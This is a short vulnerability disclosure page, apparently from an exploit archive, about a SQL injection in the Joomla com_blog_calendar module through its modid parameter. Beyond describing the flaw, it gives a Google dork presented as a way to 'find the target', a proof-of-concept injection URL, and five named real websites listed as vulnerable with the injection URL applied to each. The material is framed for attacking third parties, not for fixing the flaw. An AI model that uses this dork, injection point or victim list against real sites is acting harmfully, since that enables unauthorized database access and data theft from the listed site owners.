Joomla Blog Calendar SQL Injection

2016.12.27
Credit: X-Cisadane
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

========================================================================================== Joomla com_blog_calendar SQL Injection Vulnerability ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Joomla com_blog_calendar SQL Injection Vulnerability : # Date : 26th December 2016 : # Author : X-Cisadane : # CMS Name : Joomla : # CMS Developer : http://joomlacode.org/gf/project/blog_calendar/ : # Category : Web Application : # Vulnerability : SQL Injection : # Tested On : SQLMap 1.0.12.9#dev : # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan :-------------------------------------------------------------------------------------------------------------------------: A SQL Injection Vulnerability has been discovered in the Joomla Module called com_blog_calendar. The Vulnerability is located in the index.php?option=com_blog_calendar&modid=xxx Parameter. Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated modid Value. Attackers are able to read Database information by execution of own SQL commands. DORKS (How to find the target) : ================================ inurl:/index.php?option=com_blog_calendar Or use your own Google Dorks :) Proof of Concept ================ SQL Injection PoC : http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi] Screenshot (PoC) : http://i64.tinypic.com/2rqhhk4.png Example of Vuln Sites : https://www.zen-road.org/index.php?option=com_blog_calendar&modid=['SQLi] http://www3.unitus.it/index.php?option=com_blog_calendar&modid=['SQLi] http://chausyleshoz.by/en/index.php?option=com_blog_calendar&modid=['SQLi] http://www.foms.kg/index.php?option=com_blog_calendar&modid=['SQLi] http://www.iab.com.bd/index.php?option=com_blog_calendar&modid=['SQLi] ... etc ...


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top